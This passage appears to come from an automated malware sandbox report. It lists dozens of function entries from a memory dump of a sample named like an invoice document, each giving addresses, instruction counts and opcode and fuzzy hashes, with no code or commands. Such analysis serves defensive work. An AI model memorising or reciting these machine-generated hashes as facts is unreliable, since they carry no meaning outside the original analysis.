                                                                                                                                • Instruction ID: b4412a2445a6bbaa72174215b9ad5f0d8161da46926c5645e6df31d27af86e32
                                                                                                                                • Opcode Fuzzy Hash: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                                • Instruction Fuzzy Hash: 1A018936100149ABCF12AE84D840EDA7F66FB4C664F058116FE1866224C332D9B0EB91
                                                                                                                                Function 016FC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                                • Instruction ID: 31b73c4db135c3d7b23338d4de90435a68e48c6858999142747bb58fed4b1589
                                                                                                                                • Opcode Fuzzy Hash: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                                • Instruction Fuzzy Hash: 86F024726042495BF354DA1D8C02F23329AE7D0696FA5806EEB058B3C1EF71DC1283A6
                                                                                                                                Function 0173656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                                • Instruction ID: 73cf9a47e2c8b145a7eb3f894fa6fe0618934c9c98cc488b6cbe50a5333b8290
                                                                                                                                • Opcode Fuzzy Hash: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                                • Instruction Fuzzy Hash: AE01A470301681ABE7229B2CCD4CF25BBE4BB80B14F5841A4BA019B6DBD728D541C220
                                                                                                                                Function 017A437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                • Instruction ID: ac8e2bd7dba67c94de5246563d6f4fc9bfe3c536439dff5f61264cd616cb40c7
                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                • Instruction Fuzzy Hash: 06F0E93534191347EB35AA2E8424B2EEA559FD0A01B4D472D9603EB644DFA1D8058790
                                                                                                                                Function 0178E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                • Instruction ID: de8f51ccfb9caabe7a984b457dac0bf8a80a2489880a545ef30a013a6fa5e0f8
                                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                • Instruction Fuzzy Hash: 25F082337E56229BE331AE4ECC80F1AF7A8EFD5A60F191475A6149B264CB60EC41C7D0
                                                                                                                                Function 0178C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                                • Instruction ID: 85e0d51f55ec4d9011eb6944c06f71e40d6fffd7aa350a5c9acb2cbc2df5ecb1
                                                                                                                                • Opcode Fuzzy Hash: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                                • Instruction Fuzzy Hash: BDF0AF706593049FC310EF68C445A1BF7E4FF98710F80465AB898DB394E634E900CB96
                                                                                                                                Function 01730854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                • Instruction ID: a255d424a4dc6c927bb3d4c465695fc852ce311719750ff573b958c35370a1b1
                                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                • Instruction Fuzzy Hash: 0FF02472600200AFE314DF25CC00F86B7E9EFE8304F148078A544CB164FAB0DD10C694
                                                                                                                                Function 0178C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                                • Instruction ID: 19df370ede48d378798e223da9b4cb2de232315d7249ec021c158208ef82181a
                                                                                                                                • Opcode Fuzzy Hash: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                                • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515EAEF7B4FF18300F108059B955EB399DA34EA01CB64
                                                                                                                                Function 017047FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                                • Instruction ID: f36c0fd6dd9cdb6503e58c11651ea6757317af21fb2b42147e68092d077f135d
                                                                                                                                • Opcode Fuzzy Hash: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                                • Instruction Fuzzy Hash: 7BF0B4719967D5DFE733DB6CC444B21FBD49B01621F084DAAD74B875C2C7A4DA80C650
                                                                                                                                Function 017C0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                                • Instruction ID: 5ccd9cd67484830c00e09b31cb87b58aedf807e95cd2f0600371397d1e3db2d7
                                                                                                                                • Opcode Fuzzy Hash: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                                • Instruction Fuzzy Hash: 3FF0272E41A6808BCF329B2C68983DAEB55E781A24F09144DF4A057209C6748883C3A0
                                                                                                                                Function 0173C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
                                                                                                                                • Instruction ID: b46435dd72bf7a016a8b7172a4572b3d9618608dcc926e1451c0a746dcfa163d
                                                                                                                                • Opcode Fuzzy Hash: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
                                                                                                                                • Instruction Fuzzy Hash: D4F0E271511691DFE3239B2CC948B11FBE89B857A1F089467D50697523C760E880DA51
                                                                                                                                Function 01742619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                • Instruction ID: 0e6076e6981fb16d23bad64a048914ba76001553a721abaed099aa690958608b
                                                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                • Instruction Fuzzy Hash: 81E0D8323006016BE7119E599CC4F47BB6EDFD6B10F050079B6045F256CAE2DC1986A4
                                                                                                                                Function 01796030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                • Instruction ID: 21abb0275011dc807c9c6189ef12aa37eabace2ed3cc2651f38b763893dae151
                                                                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                • Instruction Fuzzy Hash: B1F01C721046049FE7218F0DE984F62FBB8EB45364F45C166E6099B661D379EC44CBA4
                                                                                                                                Function 01700710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                • Instruction ID: fbff1d49b80a0f52ab5d7b6267f0d592d85c73777b170b3b40a6e253f4de0dac
                                                                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                • Instruction Fuzzy Hash: 5DF0E539204741DBDB17CF19C040B95FBE4FB413A0B000094FC428B341DB75E982CB90
                                                                                                                                Function 017349D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                • Instruction ID: 527e57a11d02900a5696d38ce279acb97cd39b140376003db12607fa52326762
                                                                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                • Instruction Fuzzy Hash: C1E0D832244145ABD3291A698808B66FBA5EBD57A0F150429E2028B156DB70DD42C7D9
                                                                                                                                Function 017D4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
                                                                                                                                • Instruction ID: 9159497725958f7a09d5e198e88793681d8297a144976561d5f92bc413351029
                                                                                                                                • Opcode Fuzzy Hash: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
                                                                                                                                • Instruction Fuzzy Hash: 67F0E531A255954FE772D73CEA44B56F7F1AB10630F4E0564D4128BD16C330DC40C650
                                                                                                                                Function 017A678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                • Instruction ID: 132e08e4d955a0d987bda54132559c613b9a1b8bde6428744ecd29b17995becd
                                                                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                • Instruction Fuzzy Hash: 1AE0DF32A00120BBDB2197998D09F9AFEACDBD4EA0F090054B601EB0E4E530DE00D6D0
                                                                                                                                Function 017D08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                • Instruction ID: be7b28d7586b3abbd8cd96d32608b0fa690ae90a7d5b443a5ee4f56c1f77fe41
                                                                                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                • Instruction Fuzzy Hash: B4E09B316803588FCB259A1DC141A53FFF8DFB5660F1590ADE90547612C231F842C6D0
                                                                                                                                Function 017025E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: de0c8b2b0ae981ee36c9d45fe8e9530eea66e4f75c12c47e1965a068d3c1bac3
                                                                                                                                • Instruction ID: 50a79989b928991ef7d63be24baba234eb71e5828f291519bbb911b3f707b912
                                                                                                                                • Opcode Fuzzy Hash: de0c8b2b0ae981ee36c9d45fe8e9530eea66e4f75c12c47e1965a068d3c1bac3
                                                                                                                                • Instruction Fuzzy Hash: 78E09232100A549BC322BF29DD09F8BB7DAEB60770F014529B115571D9CB30A810C788
                                                                                                                                Function 017BA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                • Instruction ID: c64c0a1d0fae6a032f70fd0eaa66c2841e6d2f0a3ca7189eee43e2a31850fcfd
                                                                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                • Instruction Fuzzy Hash: E2E06D31010A11DBE7326F2ED84CB92FAA0AF50711F148C29A096124B4C7B898C1CA40
                                                                                                                                Function 01784000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                • Instruction ID: e18edc8b234446c227e04b83218ce8e151f5e980391312d31003b3b2fa6f706f
                                                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                • Instruction Fuzzy Hash: E0E0AE343403068BE715DF19C040B62BBB6BFD5A10F28C0A8A9498F205EB72A8438A40
                                                                                                                                Function 0173CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67fa28d91f02944fe85671e5df282e5be8ac3bf31547b59d10dee9ccc6bfd06a
                                                                                                                                • Instruction ID: 7ad1b0fec7af01affa5905920b9953347863ed124a5437f3c2767c0ed91c56c6
                                                                                                                                • Opcode Fuzzy Hash: 67fa28d91f02944fe85671e5df282e5be8ac3bf31547b59d10dee9ccc6bfd06a
                                                                                                                                • Instruction Fuzzy Hash: F7D02B324850306ACB37E11C7C08F93BB999BC5230F018862F208B2017D514CD8382D4
                                                                                                                                Function 016F823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                • Instruction ID: e3299b9bdbebdc0e9b79036e25357e0f19eea28780ea496714054a5c150220f2
                                                                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                • Instruction Fuzzy Hash: 04E0C235000A10EFDB322F19EC04F51B6A9FF94B60F21886DF182070AA97B0BC92CB84
                                                                                                                                Function 01702050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1b343bcf0441eb30984663ab21ee73a4c7d8c8189f0ab86cabafd516dab1c160
                                                                                                                                • Instruction ID: 3dd7326e6234c66221aef1fa8af75f527ccbf7fb3fd4e0690a8749111991a836
                                                                                                                                • Opcode Fuzzy Hash: 1b343bcf0441eb30984663ab21ee73a4c7d8c8189f0ab86cabafd516dab1c160
                                                                                                                                • Instruction Fuzzy Hash: AFE08C32100550ABC312FA5DDD04E4AB3DAEBA4770F004125B151876D8CA20AC00C794
                                                                                                                                Function 01738A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                • Instruction ID: 6de15bf254350d62268f98c1db1ca2eac1d4338bbfd8cc1a8f0a33750ab8cb3f
                                                                                                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                • Instruction Fuzzy Hash: E8E08633111A1487C729DE18D511B72B7A4EF85720F09473EA65387781C534E544C795
                                                                                                                                Function 01756AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                • Instruction ID: f6d178ede72500df2b2fbd5e5264a5857509737fa83ea7246d50f8219a124e99
                                                                                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                • Instruction Fuzzy Hash: 89D05E36511A50AFD3329F1BEA04C13FBF9FBC4E207050A2EB54583A24C670A806CBA0
                                                                                                                                Function 0173E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                • Instruction ID: 256854034d77f7f447e8df7dbcc6ce996f51a0422f30aed00a8087a426298d9a
                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                • Instruction Fuzzy Hash: 4BD0A7321045105BD732AA1CFC04FC373D8BB48730F050459B014C7054C360AC41C644
                                                                                                                                Function 0177E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                • Instruction ID: 94048e0b93da74e8e991617dd2967e0de8b545f4b7465df60e16a3bdcf9cb83c
                                                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                • Instruction Fuzzy Hash: 7FE0EC369507849BDF12DF5DC644F5AFBF9BB94B40F150458A1085B6A4CA24A900CB40
                                                                                                                                Function 016FA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
